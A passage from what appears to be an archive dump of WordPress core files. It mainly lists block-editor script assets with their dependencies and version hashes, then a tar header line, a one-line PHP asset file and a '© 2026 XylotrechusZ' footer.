'wp-core-data', 'wp-data', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-viewport', 'wp-widgets'), 'version' => 'f0347fefaf37fa0d99ca'), 'editor.min.js' => array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-patterns', 'wp-plugins', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-server-side-render', 'wp-url', 'wp-viewport', 'wp-warning', 'wp-wordcount'), 'version' => 'e94186146898a6d39837'), 'element.min.js' => array('dependencies' => array('react', 'react-dom', 'wp-escape-html'), 'version' => '6a582b0c827fa25df3dd'), 'escape-html.min.js' => array('dependencies' => array(), 'version' => '6561a406d2d232a6fbd2'), 'format-library.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-block-editor', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-latex-to-mathml', 'wp-primitives', 'wp-private-apis', 'wp-rich-text', 'wp-url'), 'version' => '974ad370862111852f55'), 'hooks.min.js' => array('dependencies' => array(), 'version' => 'dd5603f07f9220ed27f1'), 'html-entities.min.js' => array('dependencies' => array(), 'version' => 'e8b78b18a162491d5e5f'), 'i18n.min.js' => array('dependencies' => array('wp-hooks'), 'version' => 'c26c3dc7bed366793375'), 'is-shallow-equal.min.js' => array('dependencies' => array(), 'version' => 'e0f9f1d78d83f5196979'), 'keyboard-shortcuts.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-data', 'wp-element', 'wp-keycodes'), 'version' => 'fbc45a34ce65c5723afa'), 'keycodes.min.js' => array('dependencies' => array('wp-i18n'), 'version' => '34c8fb5e7a594a1c8037'), 'latex-to-mathml.min.js' => array('dependencies' => array(), 'version' => '960cef31b586960935b4'), 'list-reusable-blocks.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-blob', 'wp-components', 'wp-compose', 'wp-element', 'wp-i18n'), 'version' => 'f203c56da0f227808035'), 'media-utils.min.js' => array('dependencies' => array('wp-api-fetch', 'wp-blob', 'wp-element', 'wp-i18n', 'wp-private-apis'), 'version' => 'c66754bed5498afe7050'), 'notices.min.js' => array('dependencies' => array('wp-data'), 'version' => 'f62fbf15dcc23301922f'), 'nux.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-primitives'), 'version' => 'df0a4e75f0b99fb17077'), 'patterns.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-html-entities', 'wp-i18n', 'wp-notices', 'wp-primitives', 'wp-private-apis', 'wp-url'), 'version' => '4131f04a041db58120d8'), 'plugins.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-deprecated', 'wp-element', 'wp-hooks', 'wp-is-shallow-equal', 'wp-primitives'), 'version' => '039ed87b5b9f7036ceee'), 'preferences.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-a11y', 'wp-components', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-i18n', 'wp-primitives', 'wp-private-apis'), 'version' => '2ca086aed510c242a1ed'), 'preferences-persistence.min.js' => array('dependencies' => array('wp-api-fetch'), 'version' => 'e954d3a4426d311f7d1a'), 'primitives.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-element'), 'version' => '0b5dcc337aa7cbf75570'), 'priority-queue.min.js' => array('dependencies' => array(), 'version' => '2d59d091223ee9a33838'), 'private-apis.min.js' => array('dependencies' => array(), 'version' => '4f465748bda624774139'), 'redux-routine.min.js' => array('dependencies' => array(), 'version' => '8bb92d45458b29590f53'), 'reusable-blocks.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives', 'wp-url'), 'version' => '6c0ec6e24f166c9b36e7'), 'rich-text.min.js' => array('dependencies' => array('wp-a11y', 'wp-compose', 'wp-data', 'wp-deprecated', 'wp-element', 'wp-escape-html', 'wp-i18n', 'wp-keycodes'), 'version' => '5bdbb44f3039529e3645'), 'router.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-element', 'wp-private-apis', 'wp-url'), 'version' => '2dfc4b954318a03e6a76'), 'server-side-render.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n', 'wp-url'), 'version' => '7db2472793a2abb97aa5'), 'shortcode.min.js' => array('dependencies' => array(), 'version' => '0b3174183b858f2df320'), 'style-engine.min.js' => array('dependencies' => array(), 'version' => '7c6fcedc37dadafb8a81'), 'token-list.min.js' => array('dependencies' => array(), 'version' => 'cfdf635a436c3953a965'), 'url.min.js' => array('dependencies' => array(), 'version' => '9e178c9516d1222dc834'), 'viewport.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-compose', 'wp-data'), 'version' => 'f07b4909c08cfe9de4e2'), 'views.min.js' => array('dependencies' => array('wp-data', 'wp-element', 'wp-preferences'), 'version' => 'ffb9f0d96ccb2a0d04bd'), 'warning.min.js' => array('dependencies' => array(), 'version' => 'd69bc18c456d01c11d5a'), 'widgets.min.js' => array('dependencies' => array('react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-element', 'wp-i18n', 'wp-notices', 'wp-primitives'), 'version' => 'c0e4adfacd4c628b1d02'), 'wordcount.min.js' => array('dependencies' => array(), 'version' => 'c5b97f11206928ea9130'));
script-loader-react-refresh-runtime.php000066600000000124152241256320014241 0ustar00<?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
© 2026 XylotrechusZ